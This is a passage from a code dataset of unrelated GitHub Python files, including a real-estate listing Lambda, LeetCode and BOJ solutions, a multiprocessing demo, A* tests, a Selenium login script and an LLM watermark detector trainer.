if 'ListPrice' in open_response_colorado[i]:\n l_listing_price = open_response_colorado[i]['ListPrice']\n prices.append(int(open_response_colorado[i]['ListPrice']))\n if 'OnMarketTimestamp' in open_response_colorado[i]:\n l_listing_date = open_response_colorado[i]['OnMarketTimestamp']\n cur.execute(ins_open, ((str(l_id)), str(l_status), 
str(l_postal_code), str(l_realtor_name), str(l_listing_price), str(total_units_open_), str(l_listing_date)))\n l_id = 'NULL'\n l_status = 'NULL'\n l_postal_code = 'NULL'\n l_realtor_name = 'NULL'\n l_listing_price = 'NULL'\n l_listing_date = 'NULL'\n\n except KeyError:\n print('key error when Entering')\n continue\n for i in range(len(open_response_pikes)):\n try:\n # for open properties in PikesPeak\n p_id = open_response_pikes[i]['ListingId']\n if 'StandardStatus' in open_response_pikes[i]:\n p_status = open_response_pikes[i]['StandardStatus']\n if 'PostalCode' in open_response_pikes[i]:\n p_postal_code = open_response_pikes[i]['PostalCode']\n postal=open_response_pikes[i]['PostalCode']\n if postal not in postal_codes:\n postal_codes[postal] = 1\n elif postal in postal_codes:\n postal_codes[postal] += 1\n if 'ListAgentFullName' in open_response_pikes[i]:\n p_realtor_name = open_response_pikes[i]['ListAgentFullName']\n agent=open_response_pikes[i]['ListAgentFullName']\n if agent not in dictionary:\n dictionary[agent] = 1\n elif agent in dictionary:\n dictionary[agent] += 1\n if 'ListPrice' in open_response_pikes[i]:\n p_listing_price = open_response_pikes[i]['ListPrice']\n prices.append(int(open_response_pikes[i]['ListPrice']))\n if 'OnMarketTimestamp' in open_response_pikes[i]:\n p_listing_date = open_response_pikes[i]['OnMarketTimestamp']\n cur.execute(ins_open, ((str(p_id)), str(p_status), str(p_postal_code), str(p_realtor_name), str(p_listing_price), str(total_units_open_), str(p_listing_date)))\n p_status = 'NULL'\n p_postal_code = 'NULL'\n p_realtor_name = 'NULL'\n p_listing_price = 'NULL'\n p_listing_date = 'NULL'\n \n\n except KeyError:\n print('key error when Entering')\n continue\n for i in range(len(closed_response_pikes)):\n try:\n # for closed properties in PikesPeak\n p2_id = closed_response_pikes[i]['ListingId']\n if 'StandardStatus' in closed_response_pikes[i]:\n p2_status = closed_response_pikes[i]['StandardStatus']\n if 'PostalCode' in closed_response_pikes[i]:\n p2_postal_code = closed_response_pikes[i]['PostalCode']\n postal=closed_response_pikes[i]['PostalCode']\n if postal not in postal_codes:\n postal_codes[postal] = 1\n elif postal in postal_codes:\n postal_codes[postal] += 1\n if 'ListAgentFullName' in closed_response_pikes[i]:\n p2_realtor_name = closed_response_pikes[i]['ListAgentFullName']\n agent=closed_response_pikes[i]['ListAgentFullName']\n if agent not in dictionary:\n dictionary[agent] = 1\n elif agent in dictionary:\n dictionary[agent] += 1\n if 'ListPrice' in closed_response_pikes[i]:\n p2_listing_price = closed_response_pikes[i]['ListPrice']\n prices.append(int(closed_response_pikes[i]['ListPrice']))\n if 'OnMarketTimestamp' in closed_response_pikes[i]:\n p2_listing_date = closed_response_pikes[i]['OnMarketTimestamp']\n if 'OffMarketTimestamp' in closed_response_pikes[i]:\n p2_closing_date = closed_response_pikes[i]['OffMarketTimestamp']\n cur.execute(ins_closed, ((str(p2_id)), str(p2_status), str(p2_postal_code), str(p2_realtor_name), str(p2_listing_price), str(total_units_sold_), str(p2_listing_date), str(p2_closing_date)))\n p2_status = 'NULL'\n p2_postal_code = 'NULL'\n p2_realtor_name = 'NULL'\n p2_listing_price = 'NULL'\n p2_listing_date = 'NULL'\n p2_closing_date = 'NULL'\n except KeyError:\n print('key error when Entering')\n continue\n for i in range(len(closed_response_colorado)):\n try:\n # for closed properties in ReColorado\n l2_id = closed_response_colorado[i]['ListingId']\n if 'StandardStatus' in closed_response_colorado[i]:\n l2_status = closed_response_colorado[i]['StandardStatus']\n if 'PostalCode' in closed_response_colorado[i]:\n l2_postal_code = closed_response_colorado[i]['PostalCode']\n postal=closed_response_colorado[i]['PostalCode']\n if postal not in postal_codes:\n postal_codes[postal] = 1\n elif postal in postal_codes:\n postal_codes[postal] += 1\n if 'ListAgentFullName' in closed_response_colorado[i]:\n l2_realtor_name = closed_response_colorado[i]['ListAgentFullName']\n agent=closed_response_colorado[i]['ListAgentFullName']\n if agent not in dictionary:\n dictionary[agent] = 1\n elif agent in dictionary:\n dictionary[agent] += 1\n if 'ListPrice' in closed_response_colorado[i]:\n l2_listing_price = closed_response_colorado[i]['ListPrice']\n prices.append(int(closed_response_colorado[i]['ListPrice']))\n if 'OnMarketTimestamp' in closed_response_colorado[i]:\n l2_listing_date = closed_response_colorado[i]['OnMarketTimestamp']\n if 'OffMarketTimestamp' in closed_response_colorado[i]:\n l2_closing_date = closed_response_colorado[i]['OffMarketTimestamp']\n cur.execute(ins_closed, ((str(l2_id)), str(l2_status), str(l2_postal_code), str(l2_realtor_name), str(l2_listing_price), str(total_units_sold_), str(l2_listing_date), str(l2_closing_date)))\n \n l2_status = 'NULL'\n l2_postal_code = 'NULL'\n l2_realtor_name = 'NULL'\n l2_listing_price = 'NULL'\n l2_listing_date = 'NULL'\n l2_closing_date = 'NULL'\n \n\n print('Value Validated')\n except KeyError:\n print('key error when Entering')\n continue\n # ListingId, status, postal_code, realtor_name, listing_price, total_open_properties\n\n conn.commit()\n\n\n \n average = sum(prices)/len(prices)\n postal_5 = heapq.nlargest(5, postal_codes, key=postal_codes.get)\n realtors_5 = heapq.nlargest(5, dictionary, key=dictionary.get)\n median = statistics.median(prices)\n units_sold = total_units_sold_\n # values must follow the column order in ins: date_inserted, time_period, average_price, median_price, total_units_sold, postal codes, realtors\n with conn.cursor() as cur:\n cur.execute(ins, (str(t), str(time_period), str(average), str(median), str(units_sold), str(postal_5[0]), str(postal_5[1]), str(postal_5[2]), str(postal_5[3]), str(postal_5[4]), str(realtors_5[0]), str(realtors_5[1]), str(realtors_5[2]), str(realtors_5[3]), str(realtors_5[4])))\n conn.commit()\n # print(str(response['data']['report'][len(response['data']['report'])-1]))\n\n return 'complete'","repo_name":"AbuBakkar2022skipq/7LendingAWS","sub_path":"Main/resources/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":19281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26089081769","text":"#DP O(n^2)\nclass Solution:\n def lengthOfLIS(self, nums: List[int]) -> int:\n if not nums:\n return 0\n table = [1 for i in range(len(nums))]\n \n max_length = 0\n for idx in range(len(table)):\n value = nums[idx]\n for nums_idx in range(0, idx):\n if nums[nums_idx] < value:\n table[idx] = max(table[idx], table[nums_idx] + 1)\n max_length = max(max_length, table[idx])\n return max_length\n\n#DP O(nlogm), n is the length of nums, m is the length of LIS\nclass Solution:\n def lengthOfLIS(self, nums: List[int]) -> int:\n stack = []\n import bisect\n for num in nums:\n insert_point = bisect.bisect_left(stack, num)\n if insert_point < len(stack):\n stack.pop(insert_point)\n stack.insert(insert_point, num)\n return 
len(stack)","repo_name":"finderkiller/LeetCode","sub_path":"300LongestIncreasingSubsequence.py","file_name":"300LongestIncreasingSubsequence.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12245228177","text":"import os\nfrom multiprocessing import Process, cpu_count\nimport signal\nimport time\n\n\"\"\"\nA simple way to create a process and run it by passing arguments to it\n\"\"\"\n\n\ndef child_process(name):\n \"\"\"\n A function that is called by the process when it is launched\n \"\"\"\n for i in range(5):\n time.sleep(1)\n print(\"{} with pid {} ---- {}\".format(name, os.getpid(), i))\n\n\nif __name__ == \"__main__\":\n \n processes = [\n Process(target=child_process, args=[\"Kid #{}\".format(i)])\n for i in range(cpu_count())\n ]\n\n for p in processes:\n p.start()\n\n for i in range(3):\n time.sleep(1)\n print(\"Parent process {} says hello\".format(os.getpid()))\n\n \n for p in processes:\n p.terminate()\n # Does the same as:\n # os.kill(p.pid, signal.SIGTERM)\n\n # In case we\n # for p in processes:\n # p.join()\n\n print(\"End of father\")\n\n exit(0)\n","repo_name":"hlyes/python_multiprocess_examples","sub_path":"pres_1/multi_processing/multi_processing.py","file_name":"multi_processing.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10484168502","text":"import unittest\nfrom AStar import AStar\nfrom Map import Map\nfrom Unit import CreateUnitInstances\nfrom Field import Field\nimport pickle\nimport random\nfrom mock import Mock\n\nmock_server_resp = ' 0.1985018253326440greengreengreengreenbasegreengreen'\n\nclass AStarTests(unittest.TestCase):\n\n def setUp(self):\n fileObj = open('map.dat','r')\n self._map = pickle.load(fileObj)\n fileObj.close()\n self.aStarInstance = AStar(self._map, (1,0,'E'),(5,4,'E'))\n\n def test_dict_key_returns_good_key(self):\n dkey = self.aStarInstance.DictKey((1,2,'E'))\n self.assertEqual(dkey,'1,2,E')\n\n def test_astar_starts_good_in_basic_mode(self):\n a = self.aStarInstance\n self.assertEqual(a.Start(),{'status':'OK','direction': 'SE', 'cost': 6})\n\n def test_heurisic_cost_calculated(self):\n a = self.aStarInstance\n x = (1,1,'E')\n y = (4,5,'E')\n self.assertEqual(a.HeuristicCost(x,y),25)\n\n def test_passage_cost_on_different_field_types(self):\n a = self.aStarInstance\n xBorder = self._map.xBorder\n yBorder = self._map.yBorder\n xRange = range(0,xBorder)\n yRange = range(0,yBorder)\n for y in yRange:\n for x in xRange:\n try:\n if not self._map[y][x].movable:\n continue\n except:\n continue\n neighbours = self._map.GetNeighbours((x,y,'E'),False)\n for nei in neighbours:\n self.assertIn(a.PassageCost(nei['field']),\n [a.normalCost,a.redCost,a.unknownCost])\n\nclass MapTests(unittest.TestCase):\n def setUp(self):\n fileObj = open('map.dat','r')\n self._map = pickle.load(fileObj)\n fileObj.close()\n def test_transferable(self):\n self.assertTrue(self._map.Transferable((1,1),(1,1)))\n self.assertTrue(not self._map.Transferable((5,3),(0,1)))\n def test_getneighbours_returns_neighbours_list(self):\n x = 1\n y = 2\n phi = 'E'\n neighbours = self._map.GetNeighbours((x,y,phi),hold=False)\n self.assertEqual(len(neighbours),7)\n for n in neighbours:\n self.assertEqual(len(n['coords']),3)\n self.assertTrue(isinstance(n['field'],\n self._map._map[y][x].__class__))\n self.assertTrue(n['direction'] in\n 
['E','SE','SW','W','NW','NE','Right','Left'])\n x = 1\n y = 2\n phi = 'SW'\n neighbours = self._map.GetNeighbours((x,y,phi),hold=True)\n self.assertEqual(len(neighbours),6)\n\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"pptaszni/CA","sub_path":"Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23891448606","text":"\"\"\"\n-------------------------------------------------------\n[program description]\n-------------------------------------------------------\nAuthor: Ryan Doucet\nID: 181954640\nEmail: douc4640@mylaurier.ca\n__updated__ = \"2019-03-21\"\n-------------------------------------------------------\n\"\"\"\n# Imports\nfrom BST_linked import BST\nfrom Letter import Letter\nfrom functions import do_comparisons, comparison_total\nimport time\n# Constants\nSEP = '------------------------------------------------------------'\ndef func():\n \"\"\"\n -------------------------------------------------------\n description\n Use:\n -------------------------------------------------------\n Parameters:\n name - description (type)\n Returns:\n name - description (type)\n ------------------------------------------------------\n\n \"\"\"\n\nstart = time.time()\nbst1 = BST()\nbst2 = BST()\nbst3 = BST()\n\nDATA1 = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\nDATA2 = \"MFTCJPWADHKNRUYBEIGLOQSVXZ\"\nDATA3 = \"ETAOINSHRDLUCMPFYWGBVKJXZQ\"\n\nfor i in DATA1:\n val = Letter(i)\n bst1.insert(val)\nfor i in DATA2:\n val = Letter(i)\n bst2.insert(val)\nfor i in DATA3:\n val = Letter(i)\n bst3.insert(val)\n\n# use a context manager so the file handle is closed after reading\nwith open('otoos610.txt', 'r', encoding='utf-8') as in_file:\n test_file = in_file.read()\n\ndo_comparisons(test_file, bst1)\ntotal1 = comparison_total(bst1)\n\ndo_comparisons(test_file, bst2)\ntotal2 = comparison_total(bst2)\n\ndo_comparisons(test_file, bst3)\ntotal3 = comparison_total(bst3)\n\n\n\nprint('Comparing by order: {}'.format(DATA1))\nprint('Total comparisons: {:,}'.format(total1))\nprint(SEP)\nprint('Comparing by order: {}'.format(DATA2))\nprint('Total comparisons: {:,}'.format(total2))\nprint(SEP)\nprint('Comparing by order: {}'.format(DATA3))\nprint('Total comparisons: {:,}'.format(total3))\nprint(SEP)\nprint()\nend = time.time()\ntime_total = end-start\nprint('Took {:.2f}s to execute'.format(time_total))\n","repo_name":"Ryanadoucet/BST_Test","sub_path":"t02.py","file_name":"t02.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31763870940","text":"# Shepherd Kkung (BOJ 3187)\n\"\"\"\nR = height of the grid, C = width of the grid\n. = empty space, # = fence, v = wolf, k = sheep\n\"\"\"\nimport sys\nsys.setrecursionlimit(10**6)\n\nR,C = map(int,input().split())\nland = []\nfor r in range(R):\n land.append(list(input()))\n\nmove = [[-1,0],[1,0],[0,-1],[0,1]]\n\ndef dfs(x,y):\n global k,v # use the global counters\n if land[x][y] == '#': # return early so a fence cell visited from the main loop cannot merge two regions\n return\n if land[x][y] == 'k':\n k += 1\n elif land[x][y] == 'v':\n v += 1\n land[x][y] = '#'\n for i in range(4):\n dx = x + move[i][0]\n dy = y + move[i][1]\n if dx < 0 or dx >= R or dy < 0 or dy >= C:\n continue\n if land[dx][dy] != '#':\n dfs(dx, dy)\n\nlamb, wolf = 0, 0\nfor r in range(R):\n for c in range(C):\n k, v = 0, 0\n dfs(r, c)\n if k > v:\n lamb += k\n else:\n wolf += v\n\nprint(lamb,wolf)","repo_name":"yerimstar/BOJ","sub_path":"Python/etc/3187.py","file_name":"3187.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6321156847","text":"import time\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.options import Options\nimport pyperclip\nimport subprocess\nfrom datetime import datetime\n\nchrome_options = Options()\nchrome_options.add_argument('--headless') # Run Chrome in headless mode\nchrome_options.add_argument('--disable-gpu') # Disable GPU acceleration\n\ndriver = webdriver.Chrome(service=Service(ChromeDriverManager().install()),options=chrome_options)\n\ndef display_notification(message):\n # Escape the double quotes in the message for the AppleScript string\n escaped_message = message.replace('\"', '\\\\\"')\n applescript = f'display notification \"{escaped_message}\"'\n subprocess.run(['osascript', '-e', applescript], capture_output=True)\n time.sleep(10)\n\ndef test_google_search():\n try:\n # Open the website\n driver.get('https://ajey.vercel.app')\n\n username = driver.find_element(By.CSS_SELECTOR,'#root > div > div > div > div > div.css-175oi2r.r-13awgt0 > div > div.css-175oi2r.r-1p0dtai.r-1d2f490.r-u8s1d.r-zchlnj.r-ipm5af.r-12vffkv > div:nth-child(2) > div > div > div > div.css-175oi2r.r-13awgt0 > div > div > div:nth-child(2) > input:nth-child(2)')\n username.send_keys('rnd')\n password = driver.find_element(By.CSS_SELECTOR,'#root > div > div > div > div > div.css-175oi2r.r-13awgt0 > div > div.css-175oi2r.r-1p0dtai.r-1d2f490.r-u8s1d.r-zchlnj.r-ipm5af.r-12vffkv > div:nth-child(2) > div > div > div > div.css-175oi2r.r-13awgt0 > div > div > div:nth-child(2) > input:nth-child(3)')\n password.send_keys('1.1.1')\n \n getInButton = driver.find_element(By.CSS_SELECTOR,'#root > div > div > div > div > div.css-175oi2r.r-13awgt0 > div > div.css-175oi2r.r-1p0dtai.r-1d2f490.r-u8s1d.r-zchlnj.r-ipm5af.r-12vffkv > div:nth-child(2) > div > div > div > div.css-175oi2r.r-13awgt0 > div > div > div:nth-child(2) > div.css-175oi2r.r-1i6wzkk.r-lrvibr.r-1loqt21.r-1otgn73')\n getInButton.click()\n\n time.sleep(5)\n search = driver.find_element(By.CSS_SELECTOR,'#root > div > div > div > div > div.css-175oi2r.r-13awgt0 > div > div.css-175oi2r.r-1p0dtai.r-1d2f490.r-u8s1d.r-zchlnj.r-ipm5af.r-12vffkv > div:nth-child(2) > div > div > div > div.css-175oi2r.r-13awgt0 > div > div > div:nth-child(2) > div:nth-child(2) > div:nth-child(3) > div:nth-child(1) > div.css-175oi2r.r-1i6wzkk.r-lrvibr.r-1loqt21.r-1otgn73 > div.css-1rynq56')\n search.click()\n\n searchBox = driver.find_element(By.CSS_SELECTOR,'#root > div > div > div > div 
> div.css-175oi2r.r-13awgt0 > div > div.css-175oi2r.r-1p0dtai.r-1d2f490.r-u8s1d.r-zchlnj.r-ipm5af.r-12vffkv > div:nth-child(2) > div > div > div > div.css-175oi2r.r-13awgt0 > div > div > div:nth-child(2) > div:nth-child(2) > div:nth-child(2) > textarea')\n searchCLI = input('Search For : ')\n print('\\n Searching..', searchCLI)\n searchBox.send_keys(searchCLI)\n # selectBook = driver.find_element(By.CSS_SELECTOR,'#root > div > div > div > div > div.css-175oi2r.r-13awgt0 > div > div.css-175oi2r.r-1p0dtai.r-1d2f490.r-u8s1d.r-zchlnj.r-ipm5af.r-12vffkv > div:nth-child(2) > div > div > div > div.css-175oi2r.r-13awgt0 > div > div > div:nth-child(2) > div:nth-child(1) > div:nth-child(6) > div > div')\n # selectBook.click()\n\n con = driver.find_element(By.CSS_SELECTOR,'#root > div > div > div > div > div.css-175oi2r.r-13awgt0 > div > div.css-175oi2r.r-1p0dtai.r-1d2f490.r-u8s1d.r-zchlnj.r-ipm5af.r-12vffkv > div:nth-child(2) > div > div > div > div.css-175oi2r.r-13awgt0 > div > div > div:nth-child(2) > div:nth-child(2) > div:nth-child(5) > div > div:nth-child(1) > div.css-175oi2r.r-1i6wzkk.r-lrvibr.r-1loqt21.r-1otgn73 > div > div:nth-child(2) > div > textarea')\n # driver.save_screenshot(\"screenshot.png\")\n showThis = con.text\n print('>>> ',showThis)\n pyperclip.copy(showThis)\n display_notification(\"Item copied: \" + showThis)\n\n time.sleep(10)\n # Verify the expected content or title on the page to confirm success\n print('Test passed!')\n time.sleep(50)\n\n except AssertionError as e:\n print('Test failed:', str(e))\n finally:\n # Close the browser\n driver.quit()\n\ndef create_reminder(title, notes, due_date):\n command = [\n '/System/Applications/reminders', # Replace with the actual path to the reminders command\n 'add',\n '--title', title,\n '--notes', notes,\n '--due', due_date\n ]\n subprocess.run(command)\n\nreminder_title = \"A Project\"\nreminder_notes = \"Complete the final report and submit it.\"\nreminder_due_date = \"2023-08-10 09:14:50\" # Corrected ISO 8601 date and time format\n\n\n\nif __name__ == \"__main__\":\n test_google_search()\n # create_reminder(reminder_title, reminder_notes, reminder_due_date)\n","repo_name":"ajayoncode/pythonScripts","sub_path":"Dummy/a1.py","file_name":"a1.py","file_ext":"py","file_size_in_byte":4973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18833786072","text":"import torch.nn as nn\nimport torch\nfrom util.bit_util import int_to_bin_list\nfrom torch.utils.data import Dataset, DataLoader\nimport os\nimport json\nimport torch.nn.functional as F\nfrom model_key import SubNet\nfrom transformers import GPT2Tokenizer, AutoTokenizer, LlamaTokenizer\nimport torch.nn as nn\nimport json\n\nclass TransformerClassifier(nn.Module):\n def __init__(self, bit_number, b_layers, input_dim, hidden_dim, num_classes=1, num_layers=2):\n super(TransformerClassifier, self).__init__()\n self.binary_classifier = SubNet(bit_number, b_layers)\n self.classifier = nn.LSTM(input_dim, hidden_dim, num_layers, batch_first=True)\n self.fc_hidden = nn.Linear(hidden_dim, hidden_dim)\n self.fc = nn.Linear(hidden_dim, num_classes)\n self.sigmoid = nn.Sigmoid()\n self.dropout = nn.Dropout(0.1)\n\n def forward(self, x):\n batch_size, seq_len, _ = x.size()\n x1 = x.view(batch_size*seq_len, -1)\n features = self.binary_classifier(x1)\n features = features.view(batch_size, seq_len, -1) # Ensure LSTM compatible shape\n output, _ = self.classifier(features)\n output = self.fc_hidden(output[:, -1, :]) # Take the last LSTM 
output for classification\n output = self.dropout(output)\n output = self.sigmoid(output)\n output = self.fc(output) \n output = self.dropout(output)\n output = self.sigmoid(output)\n return output\n\nclass Seq2SeqDataset(Dataset):\n def __init__(self, data):\n self.data = data\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n return self.data[idx]\n\ndef prepare_data(filepath, train_or_test=\"train\", llm_name=\"gpt2\", bit=16, z_value=4):\n data = []\n if train_or_test == \"train\":\n with open(filepath, 'r') as f:\n for line in f:\n json_obj = json.loads(line)\n inputs = json_obj['Input']\n output = json_obj['Output']\n label = 1 if output > z_value else 0 # binary classification\n \n inputs_bin = [int_to_bin_list(n, bit) for n in inputs]\n \n data.append((torch.tensor(inputs_bin), torch.tensor(label))) # label is a scalar\n else:\n with open(filepath, 'r') as f:\n for line in f:\n json_obj = json.loads(line)\n inputs = json_obj['Input']\n label = json_obj['Tag']\n z_score = json_obj['Z-score']\n \n if llm_name == \"gpt2\":\n tokenizer = GPT2Tokenizer.from_pretrained(\"gpt2\")\n inputs = tokenizer(inputs, return_tensors=\"pt\", add_special_tokens=True)\n elif llm_name == \"opt-1.3b\":\n tokenizer = AutoTokenizer.from_pretrained(\"facebook/opt-1.3b\", use_fast=False)\n inputs = tokenizer(inputs, return_tensors=\"pt\", add_special_tokens=True)\n elif llm_name == \"llama-7b\":\n tokenizer = LlamaTokenizer.from_pretrained(\"decapoda-research/llama-7b-hf\")\n inputs = tokenizer(inputs, return_tensors=\"pt\", add_special_tokens=True)\n \n inputs_bin = [int_to_bin_list(n, bit) for n in inputs[\"input_ids\"].squeeze()]\n \n data.append((torch.tensor(inputs_bin), torch.tensor(label), torch.tensor(z_score))) # label is a scalar\n \n return data\n\n\ndef pad_sequence_to_fixed_length(inputs, target_length, padding_value=0):\n padded_inputs = torch.nn.utils.rnn.pad_sequence(inputs, batch_first=True, padding_value=padding_value)\n \n original_length = padded_inputs.shape[1]\n\n if original_length < target_length:\n # If the original sequence is shorter than the target length, we need to further pad the sequences\n pad_size = (0, 0, 0, target_length - original_length)\n padded_inputs = F.pad(padded_inputs, pad_size, value=padding_value)\n elif original_length > target_length:\n # If the original sequence is longer than the target length, we need to truncate the sequences\n padded_inputs = padded_inputs[:, :target_length, :]\n else:\n # If the original sequence is the same as the target length, just return the original inputs\n padded_inputs = padded_inputs\n\n return padded_inputs\n\ndef train_collate_fn(batch):\n inputs = [item[0] for item in batch]\n targets = [item[1] for item in batch]\n \n inputs_padded = pad_sequence_to_fixed_length(inputs, 200)\n \n return inputs_padded, torch.stack(targets)\n\ndef test_collate_fn(batch):\n inputs = [item[0] for item in batch]\n targets = [item[1] for item in batch]\n z_score = [item[2] for item in batch]\n \n inputs_padded = pad_sequence_to_fixed_length(inputs, 200)\n \n return inputs_padded, torch.stack(targets), torch.stack(z_score)\n\ndef train_model(_bit_number, _input_dir, model_file, output_model_dir, b_layers, z_value, llm_name):\n # Prepare data\n train_data = prepare_data(os.path.join(_input_dir, 'train_data.jsonl'), train_or_test=\"train\", bit=_bit_number, z_value=z_value, llm_name=llm_name)\n test_data = prepare_data(os.path.join(_input_dir, 'test_data.jsonl'), train_or_test=\"test\", bit=_bit_number, z_value=z_value, 
llm_name=llm_name)\n\n train_dataset = Seq2SeqDataset(train_data)\n test_dataset = Seq2SeqDataset(test_data)\n\n train_dataloader = DataLoader(train_dataset, batch_size=64, shuffle=True, collate_fn=train_collate_fn)\n test_dataloader = DataLoader(test_dataset, batch_size=32, collate_fn=test_collate_fn)\n\n # Initialize model and optimizer\n pretrained_dict = torch.load(model_file)\n model = TransformerClassifier(_bit_number, b_layers, 64, 128)\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n model = model.to(device)\n model_dict = model.binary_classifier.state_dict()\n pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict}\n model_dict.update(pretrained_dict)\n model.binary_classifier.load_state_dict(model_dict, strict=True)\n\n optimizer = torch.optim.Adam(model.parameters(), lr=0.0005)\n\n # Define the loss function\n loss_fn = torch.nn.BCELoss()\n\n for param in model.binary_classifier.parameters():\n param.requires_grad = False\n\n print(\"private detector:\")\n # save the average acc, tpr, fpr, tnr, fnr of the last 5 epochs\n acc_avg, tpr_avg, fpr_avg, tnr_avg, fnr_avg, f1_avg = 0, 0, 0, 0, 0, 0\n # Train and evaluate\n epochs = 80\n for epoch in range(epochs):\n model.train()\n train_losses = []\n correct = 0\n total = 0\n for inputs, targets in train_dataloader:\n targets = targets.cuda()\n optimizer.zero_grad()\n outputs = model((inputs.float()).cuda())\n outputs = outputs.reshape([-1])\n loss = loss_fn(outputs, (targets.float()))\n loss.backward()\n optimizer.step()\n train_losses.append(loss.item())\n\n # calculate accuracy\n predicted = (outputs.data > 0.5).float() \n total += targets.size(0)\n correct += (predicted == targets).sum().item()\n\n train_accuracy = 100 * correct / total\n\n model.eval()\n test_losses = []\n correct, total, tp, fp, fn, tn = 0, 0, 0, 0, 0, 0\n with torch.no_grad():\n for inputs, targets, z_score in test_dataloader:\n outputs = model((inputs.float()).cuda()).cuda()\n targets = targets.cuda()\n outputs = outputs.reshape([-1])\n loss = loss_fn(outputs, targets.float())\n test_losses.append(loss.item())\n\n # calculate acc, tp, fp, fn, tn, f1\n predicted = (outputs.data > 0.5).int() \n total += targets.size(0)\n correct += (predicted == targets).sum().item()\n tp += (predicted & targets).sum().item()\n fp += (predicted & (~(targets.bool()))).sum().item()\n fn += ((~predicted) & targets).sum().item()\n tn += ((~predicted) & (~(targets.bool()))).sum().item()\n\n test_accuracy = 100 * correct / total\n test_tpr = 100 * tp / (tp + fn)\n test_fpr = 100 * fp / (fp + tn)\n test_tnr = 100 * tn / (fp + tn)\n test_fnr = 100 * fn / (tp + fn)\n test_f1 = 100 * 2 * tp / (2 * tp + fn + fp)\n\n print(f'Epoch: {epoch}, Train Loss: {sum(train_losses) / len(train_losses)}, Train Accuracy: {train_accuracy}%, Test Loss: {sum(test_losses) / len(test_losses)}, Test Accuracy: {test_accuracy}%, Test TPR: {test_tpr}%, Test FPR: {test_fpr}%, Test TNR: {test_tnr}%, Test FNR: {test_fnr}%, Test F1: {test_f1}%')\n\n # calculate the average acc, tpr, fpr, tnr, fnr, f1 of the last 5 epochs\n if epochs - 5 <= epoch < epochs:\n acc_avg += test_accuracy\n tpr_avg += test_tpr\n fpr_avg += test_fpr\n tnr_avg += test_tnr\n fnr_avg += test_fnr\n f1_avg += test_f1\n \n acc_avg /= 5\n tpr_avg /= 5\n fpr_avg /= 5\n tnr_avg /= 5\n fnr_avg /= 5\n f1_avg /= 5\n\n os.makedirs(os.path.dirname(output_model_dir + \"new.pt\"), exist_ok=True)\n torch.save(model.binary_classifier.state_dict(), output_model_dir + \"new.pt\")\n print(f'Test Accuracy: {acc_avg}%, Test 
TPR: {tpr_avg}%, Test FPR: {fpr_avg}%, Test TNR: {tnr_avg}%, Test FNR: {fnr_avg}%, Test F1: {f1_avg}%')\n\n print(\"public detector:\")\n corr_num, tot_num, tp, fp, fn, tn = 0, 0, 0, 0, 0, 0\n with open(os.path.join(_input_dir, 'test_data.jsonl'), 'r') as f:\n for line in f:\n tot_num += 1\n json_obj = json.loads(line)\n label = json_obj['Tag']\n z_score = json_obj['Z-score']\n predicted = (z_score > z_value)\n if predicted == label:\n corr_num += 1\n if predicted == 1 and label == 1:\n tp += 1\n if predicted == 1 and label == 0:\n fp += 1\n if predicted == 0 and label == 1:\n fn += 1\n if predicted == 0 and label == 0:\n tn += 1\n test_accuracy = 100 * corr_num/tot_num\n test_tpr = 100 * tp / (tp + fn)\n test_fpr = 100 * fp / (fp + tn)\n test_tnr = 100 * tn / (fp + tn)\n test_fnr = 100 * fn / (tp + fn)\n test_f1 = 100 * 2 * tp / (2 * tp + fn + fp)\n print(f'Test Accuracy: {test_accuracy}%, Test TPR: {test_tpr}%, Test FPR: {test_fpr}%, Test TNR: {test_tnr}%, Test FNR: {test_fnr}%, Test F1: {test_f1}%')\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--llm_name', type=str, default=\"gpt2\")\n parser.add_argument('--bit_number', type=int, default=4)\n parser.add_argument('--window_size', type=int, default=4)\n parser.add_argument('--input', type=str, default='data/4bit-model-key2')\n parser.add_argument('--model_file', type=str, default='model/model_parameters4.pt')\n parser.add_argument('--output_model_dir', type=str, default='model/model_parameters4.pt')\n parser.add_argument('--layers', type=int, default=4)\n parser.add_argument('--z_value', type=float, default=4.0)\n args = parser.parse_args()\n train_model(args.bit_number, args.input, args.model_file, args.output_model_dir, args.layers, args.z_value, args.llm_name)","repo_name":"THU-BPM/private_watermark","sub_path":"detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":11407,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"36960135793","text":"import re\nimport datetime\nimport logging\n\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef convert_int( data ):\n if isinstance( data, int ):\n return data\n if isinstance( data, float ):\n return data\n value = data.strip()\n value = re.sub(r'\\s+', '', value) ## remove whitespaces\n try:\n return int(value)\n except ValueError:\n return value\n\n\ndef convert_float( data ):\n if isinstance( data, float ):\n return data\n if isinstance( data, int ):\n return data\n value = data.strip()\n value = value.replace(',', '.')\n value = re.sub(r'\\s+', '', value) ## remove whitespaces\n try:\n return float(value)\n except ValueError:\n ## _LOGGER.error( \"unable to convert to float: %s %s\", value, type(value) 